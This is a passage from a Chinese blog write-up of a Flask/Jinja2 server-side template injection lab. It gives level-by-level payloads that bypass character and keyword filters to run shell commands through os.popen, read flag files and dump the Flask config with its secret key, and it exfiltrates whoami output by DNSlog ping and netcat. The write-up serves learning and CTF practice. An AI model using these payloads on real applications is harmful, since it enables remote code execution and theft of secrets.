<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__[&#39;linecache&#39;].os.popen(&#39;ping &#96;whoami&#96;.udnm02.dnslog.cn&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>dnslog带外效果</p>
<p><img src="https://s4.ax1x.com/2022/03/02/bG5IHJ.png" alt="bG5IHJ.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__[&#39;linecache&#39;].os.popen(&#39;whoami|nc 192.168.150.135 9090&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/03/02/bG5xDe.png" alt="bG5xDe.png"></p>
<h2 id="level4"><a href="#level4" class="headerlink" title="level4"></a>level4</h2><p>这一关<code>[]</code>被过滤了，这里可以使用<code>__getitem__()</code>来进行绕过,，具体如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__.__getitem__(-1).__subclasses__().__getitem__(59).__init__.__globals__.__getitem__(&#39;linecache&#39;).os.popen(&#39;cat flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level5"><a href="#level5" class="headerlink" title="level5"></a>level5</h2><p>这一关过滤了单引号和双引号，属于是没啥办法了，直接进行一个post传参的绕过捏</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code&#x3D;&#123;&#123;().__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__[request.values.arg1].os.popen(request.values.arg2).read()&#125;&#125;&amp;arg1&#x3D;linecache&amp;arg2&#x3D;cat flag</span><br></pre></td></tr></table></figure>

<h2 id="level6"><a href="#level6" class="headerlink" title="level6"></a>level6</h2><p>这一关过滤了下划线，可以使用16进制编码进行绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5fmro\x5f\x5f&quot;][-1][&quot;\x5f\x5fsubclasses\x5f\x5f&quot;]()[58][&quot;\x5f\x5finit\x5f\x5f&quot;][&quot;\x5f\x5fglobals\x5f\x5f&quot;][&#39;linecache&#39;][&#39;os&#39;].popen(&#39;cat flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level7"><a href="#level7" class="headerlink" title="level7"></a>level7</h2><p>这一关过滤了<code>.</code>，我们可以采取两种常见绕过方式</p>
<p>使用<code>[]</code>绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;[&#39;__class__&#39;][&#39;__mro__&#39;][-1][&#39;__subclasses__&#39;]()[58][&#39;__init__&#39;][&#39;__globals__&#39;][&#39;linecache&#39;][&#39;os&#39;][&#39;popen&#39;](&#39;cat flag&#39;)[&#39;read&#39;]()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>使用<code>attr()</code>绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()|attr(&#39;__class__&#39;)|attr(&#39;__base__&#39;)|attr(&#39;__subclasses__&#39;)()|attr(&#39;__getitem__&#39;)(58)|attr(&#39;__init__&#39;)|attr(&#39;__globals__&#39;)|attr(&#39;__getitem__&#39;)(&#39;linecache&#39;)|attr(&#39;__dict__&#39;)|attr(&#39;__getitem__&#39;)(&#39;os&#39;)|attr(&#39;popen&#39;)(&#39;cat flag&#39;)|attr(&#39;read&#39;)()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level8"><a href="#level8" class="headerlink" title="level8"></a>level8</h2><p>这一关过滤了如下关键字</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bl[&quot;class&quot;, &quot;arg&quot;, &quot;form&quot;, &quot;value&quot;, &quot;data&quot;, &quot;request&quot;, &quot;init&quot;, &quot;global&quot;, &quot;open&quot;, &quot;mro&quot;, &quot;base&quot;, &quot;attr&quot;]</span><br></pre></td></tr></table></figure>

<p>比较简单，直接用字符拼接的形式来绕过即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()[&#39;__cla&#39;+&#39;ss__&#39;][&#39;__mr&#39;+&#39;o__&#39;][-1][&#39;__subc&#39;+&#39;lasses__&#39;]()[58][&#39;__in&#39;+&#39;it__&#39;][&#39;__glob&#39;+&#39;als__&#39;][&#39;linecache&#39;][&#39;os&#39;][&#39;pop&#39;+&#39;en&#39;](&#39;cat flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level9"><a href="#level9" class="headerlink" title="level9"></a>level9</h2><p>这一关过滤了所有的数字，所以我们不使用数字索引即可，我们可以使用条件语句来对模块进行限制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for i in ().__class__.__base__.__subclasses__() %&#125;&#123;% if &#39;warning&#39; in i.__name__ %&#125;&#123;%print i.__init__.__globals__[&#39;linecache&#39;][&#39;os&#39;].popen(&#39;cat flag&#39;).read() %&#125;&#123;% endif %&#125;&#123;% endfor 	%&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level10"><a href="#level10" class="headerlink" title="level10"></a>level10</h2><p>这一关需要我们获取的不是flag了，而是flask的config文件，一些CTF题中会需要读取其中的secretkey来对token进行伪造，一般如果没有过滤的话直接用下面的payload就可以获取到config内容了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>效果如下</p>
<p><img src="https://s4.ax1x.com/2022/03/03/bt53IH.png" alt="bt53IH.png"></p>
<p>这一关waf是<code>set config = None</code>    ，也有一些针对性的绕过方式如下，可以通过<code>current_app</code>来获取：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[&#39;current_app&#39;].config&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;get_flashed_messages.__globals__[&#39;current_app&#39;].config&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level11"><a href="#level11" class="headerlink" title="level11"></a>level11</h2><p><strong>WAF: bl[‘\”, ‘”‘, ‘+’, ‘request’, ‘.’, ‘[‘, ‘]’]</strong></p>
<p>1.<code>&#39; &quot;</code>可以通过构造post参数来绕过，但是request被过滤了，</p>
<p>2.<code>.</code>可以用<code>[]</code>绕过，但是<code>[]</code>也被过滤了</p>
<p>3.<code>[]</code>可以使用<code>__getitem__</code>绕过</p>
<p>4.<code>.</code>可以使用过滤器<code>attr()</code>绕过，但是attr里面需要是字符串，所以需要先绕过引号</p>
<p>我们先定一个基础的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[132].__init__.__globals__[&#39;popen&#39;](&#39;cat flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>但显然这个payload是注不进去的，所以我们需要将其变型，这里需要大量使用到过滤器，我们先构造以下需要用到的关键字</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set class&#x3D;dict(__cla&#x3D;a,ss__&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set base&#x3D;dict(__bas&#x3D;a,e__&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set subclass&#x3D;dict(__subcla&#x3D;a,sses__&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set init&#x3D;dict(__in&#x3D;a,it__&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set getitem&#x3D;dict(__get&#x3D;a,item__&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set globals&#x3D;dict(__glo&#x3D;a,bals__&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set popen&#x3D;dict(pop&#x3D;a,en&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set space&#x3D;self|string()|attr(getitem)(18)%&#125;</span><br><span class="line">&#123;%set cmd&#x3D;(dict(cat&#x3D;a)|join,space,dict(flag&#x3D;b)|join)|join%&#125;</span><br><span class="line">&#123;%set read&#x3D;dict(read&#x3D;a)|join%&#125;</span><br></pre></td></tr></table></figure>

<p>上面的payload依次定义了关键字如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__class__ __base__ __subclasses__ __init__ __getitem__ __globals__ popen 空格 cat flag read</span><br></pre></td></tr></table></figure>

<p>最终利用payload如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()|attr(class)|attr(base)|attr(subclass)()|attr(getitem)(132)|attr(init)|attr(globals)|attr(getitem)(popen)(cmd)|attr(read)()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>效果</p>
<p><img src="https://s1.ax1x.com/2022/03/06/bD8Pn1.png" alt="bD8Pn1.png"></p>
<h2 id="level12-amp-13"><a href="#level12-amp-13" class="headerlink" title="level12&amp;13"></a>level12&amp;13</h2><p><strong>LEVEL 12 WAF: bl[‘_’, ‘.’, ‘0-9’, ‘\‘, ‘&#39;‘, ‘“‘, ‘[‘, ‘]’]</strong></p>
<p><strong>LEVEL 13 WAF: bl[‘_’, ‘.’, ‘\‘, ‘&#39;‘, ‘“‘, ‘request’, ‘+’, ‘class’, ‘init’, ‘arg’, ‘config’, ‘app’, ‘self’, ‘[‘, ‘]’]</strong></p>
<p>由于编写payload太麻烦，就把12和13一起看了，结合一下也就算最严格的过滤了，最后得出过滤了如下一些字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_ . 0-9 \ &#39; &quot; [] request + init class arg config app self</span><br></pre></td></tr></table></figure>

<p>先确定下payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;x.__init__.__globals__[&#39;__builtins__&#39;][&#39;__import__&#39;](‘os’).popen(&#39;cat flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>1.找个字符集</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set a&#x3D;&#123;&#125;|select|string|list%&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2022/03/06/br39EV.png" alt="br39EV.png"></p>
<p>里面有一些我们需要的符号，比如位于下标24的<code>_</code>，还有下标10的空格</p>
<p>2.构造这几个数字出来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set two&#x3D;dict(xx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set four&#x3D;dict(xxxx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set five&#x3D;dict(xxxxx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set six&#x3D;dict(xxxxxx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set ten&#x3D;two*five%&#125;</span><br><span class="line">&#123;%set twentyfour&#x3D;four*six%&#125;</span><br></pre></td></tr></table></figure>

<p>3.构造个pop来取列表或者元组中的元素</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set pop&#x3D;dict(pop&#x3D;a)|join%&#125;</span><br></pre></td></tr></table></figure>

<p>3.构造下划线<code>_</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set under&#x3D;a|attr(pop)(twentyfour)%&#125;</span><br></pre></td></tr></table></figure>

<p>4.构造空格</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set space&#x3D;a|attr(pop)(ten)%&#125;</span><br></pre></td></tr></table></figure>

<p>5.构造<code>__getitem__</code>、<code>__init__</code>、<code>__globals__</code>、<code>__builtins__</code>、<code>__import__</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set getitem&#x3D;(under,under,dict(get&#x3D;a,item&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set in&#x3D;(under,under,dict(in&#x3D;a,it&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set globals&#x3D;(under,under,dict(glo&#x3D;a,bals&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set builtins&#x3D;(under,under,dict(buil&#x3D;a,tins&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set import&#x3D;(under,under,dict(imp&#x3D;a,ort&#x3D;b)|join,under,under)|join%&#125;</span><br></pre></td></tr></table></figure>

<p>6.构造<code>os\popen\cat flag\read</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set o&#x3D;dict(o&#x3D;a,s&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set p&#x3D;dict(pop&#x3D;a,en&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set q&#x3D;dict(ca&#x3D;a,t&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set r&#x3D;dict(fl&#x3D;a,ag&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set s&#x3D;dict(re&#x3D;a,ad&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set cmd&#x3D;(q,space,r)|join%&#125;</span><br></pre></td></tr></table></figure>

<p>7.组合构造最后的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;x|attr(in)|attr(globals)|attr(getitem)(builtins)|attr(getitem)(import)(o)|attr(p)(cmd)|attr(s)()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>所以最后的组合起来exp就是如下所示常常一串…麻了！</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set a&#x3D;&#123;&#125;|select|string|list%&#125;</span><br><span class="line">&#123;%set two&#x3D;dict(xx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set four&#x3D;dict(xxxx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set five&#x3D;dict(xxxxx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set six&#x3D;dict(xxxxxx&#x3D;a)|join|length%&#125;</span><br><span class="line">&#123;%set ten&#x3D;two*five%&#125;</span><br><span class="line">&#123;%set twentyfour&#x3D;four*six%&#125;</span><br><span class="line">&#123;%set pop&#x3D;dict(pop&#x3D;a)|join%&#125;</span><br><span class="line">&#123;%set under&#x3D;a|attr(pop)(twentyfour)%&#125;</span><br><span class="line">&#123;%set space&#x3D;a|attr(pop)(ten)%&#125;</span><br><span class="line">&#123;%set getitem&#x3D;(under,under,dict(get&#x3D;a,item&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set in&#x3D;(under,under,dict(in&#x3D;a,it&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set globals&#x3D;(under,under,dict(glo&#x3D;a,bals&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set builtins&#x3D;(under,under,dict(buil&#x3D;a,tins&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set import&#x3D;(under,under,dict(imp&#x3D;a,ort&#x3D;b)|join,under,under)|join%&#125;</span><br><span class="line">&#123;%set o&#x3D;dict(o&#x3D;a,s&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set p&#x3D;dict(pop&#x3D;a,en&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set q&#x3D;dict(ca&#x3D;a,t&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set r&#x3D;dict(fl&#x3D;a,ag&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set s&#x3D;dict(re&#x3D;a,ad&#x3D;b)|join%&#125;</span><br><span class="line">&#123;%set cmd&#x3D;(q,space,r)|join%&#125;</span><br><span class="line">&#123;&#123;x|attr(in)|attr(globals)|attr(getitem)(builtins)|attr(getitem)(import)(o)|attr(p)(cmd)|attr(s)()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>效果如下</p>
<p><img src="https://s1.ax1x.com/2022/03/06/brNhPx.png" alt="brNhPx.png"></p>
<h1 id="0x03总结"><a href="#0x03总结" class="headerlink" title="0x03总结"></a>0x03总结</h1><p>通过flask+jinja2也算对SSTI简单入了个们，SSTI不仅局限于python语言，在php的twig模板等都有很奇妙的漏洞利用，希望在以后的日子里能碰到一些相关漏洞进行一些复现或者挖掘，其实最终还是归属到了不规范的代码编写让用户可控了渲染之前的模板，导致了代码执行。还是推荐使用更安全的<code>rander_template()</code>代替<code>rander_template_string()</code>。</p>
<h1 id="0x04参考"><a href="#0x04参考" class="headerlink" title="0x04参考"></a>0x04参考</h1><p>1.<a target="_blank" rel="noopener" href="https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/">https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/</a></p>
<p>2.<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7746">https://xz.aliyun.com/t/7746</a></p>
<p>3.<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10394">https://xz.aliyun.com/t/10394</a></p>
<p>4.<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/226900">https://www.anquanke.com/post/id/226900</a></p>
<p>5.<a target="_blank" rel="noopener" href="https://wsgzao.github.io/post/jinja/">https://wsgzao.github.io/post/jinja/</a></p>
<p>6.<a target="_blank" rel="noopener" href="https://johnfrod.top/ctf/flask-ssti-lab%E6%94%BB%E7%95%A5/">https://johnfrod.top/ctf/flask-ssti-lab%E6%94%BB%E7%95%A5/</a></p>
<p>7.<a target="_blank" rel="noopener" href="http://docs.jinkan.org/docs/flask/quickstart.html">http://docs.jinkan.org/docs/flask/quickstart.html</a></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Gard3nia</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://gard3nia.top/2022/03/05/%E6%B5%85%E6%8E%A2-Flask-jinja2-SSTI/">https://gard3nia.top/2022/03/05/%E6%B5%85%E6%8E%A2-Flask-jinja2-SSTI/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://gard3nia.top" target="_blank">Gard3nia's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/SSTI/">SSTI</a></div><div class="post_share"><div class="social-share" data-image="https://s4.ax1x.com/2021/12/08/oWeAoj.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="/img/wx.png" target="_blank"><img class="post-qr-code-img" src="/img/wx.png" alt="wechat"/></a><div class="post-qr-code-desc">wechat</div></li><li class="reward-item"><a href="/img/zfb.jpg" target="_blank"><img class="post-qr-code-img" src="/img/zfb.jpg" alt="alipay"/></a><div class="post-qr-code-desc">alipay</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/03/07/ATT-CK%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97-%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98-%E4%B8%80/"><img class="prev-cover" src="https://z3.ax1x.com/2021/11/13/Is5bmn.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">ATT&amp;CK实战系列--红队实战(一)</div></div></a></div><div class="next-post pull-right"><a href="/2022/02/23/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><img class="next-cover" src="https://s4.ax1x.com/2022/02/23/bPwNRS.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Python沙箱逃逸总结</div></div></a></div></nav></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By Gard3nia</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>